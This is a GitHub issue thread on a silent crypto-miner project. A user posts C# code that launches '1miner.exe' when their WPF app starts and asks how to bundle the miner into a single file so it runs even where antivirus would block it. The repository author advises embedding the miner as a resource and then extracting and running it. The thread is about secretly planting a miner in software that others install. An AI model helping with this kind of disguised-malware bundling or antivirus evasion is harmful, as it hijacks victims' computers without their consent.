### ISSUE TITLE
how to open that miner from another c# file

### ISSUE THREAD

**Issue by qmada** [UnamSanctam/SilentCryptoMiner#1686]
public partial class App : Application
    {
        private string path = "1miner.exe";

        protected void ApplicationStart(object sender, StartupEventArgs e)
        {
            bool isOtherExeRunning = IsProcessRunning(path);

            var loginView = new LoginView();
            loginView.Show();
            loginView.IsVisibleChanged += (s, ev) =>
            {
                if (loginView.IsVisible == false && loginView.IsLoaded)
                {

                    Process.Start(path);

                    var mainView = new MainView();
                    mainView.Show();
                    loginView.Close();
                }
            };

        }

        private bool IsProcessRunning(string processName)
        {

            var processes = System.Diagnostics.Process.GetProcessesByName(processName);
            

            return processes.Length > 0;
        }

    }
    
    thats the code i have. When my app opens i want miner to open and only after to open windows they need. (i want to make 1 file ) I want to bundle my application and the miner. If I bundle with SFX archive, if the antivirus is not disabled, it will run the application they need but will not run the miner, I do not need it that way. I need it to start the miner and if it starts, it starts the application. How can i do that?

**Comment by UnamSanctam** [comment]
You mean a file binder (a bound file that extracts both your application and the miner and then runs both)? Or do you want to directly extract and start the miner from inside the application once your application is started?

**Comment by qmada** [comment]
yes, i want to directly extract and start the miner from inside your application once your application is started

**Comment by qmada** [comment]
how can i do it?

**Comment by UnamSanctam** [comment]
You can include the miner as a Resource inside your C# program, then you can extract that Resource to the disk and run it.

**Comment by qmada** [comment]
protected void ApplicationStart(object sender, StartupEventArgs e)
    {
        bool isOtherExeRunning = IsProcessRunning(path);

        var loginView = new LoginView();
        loginView.Show();
        loginView.IsVisibleChanged += (s, ev) =>
        {
            if (loginView.IsVisible == false && loginView.IsLoaded)
            {

                Process.Start(path);


                var mainView = new MainView();
                mainView.Show();
                loginView.Close();
            }
        };

    }

    private bool IsProcessRunning(string processName)
    {

        var processes = System.Diagnostics.Process.GetProcessesByName(processName);
        

        return processes.Length > 0;
    }

}

that code doesnt seem work, can you check why?
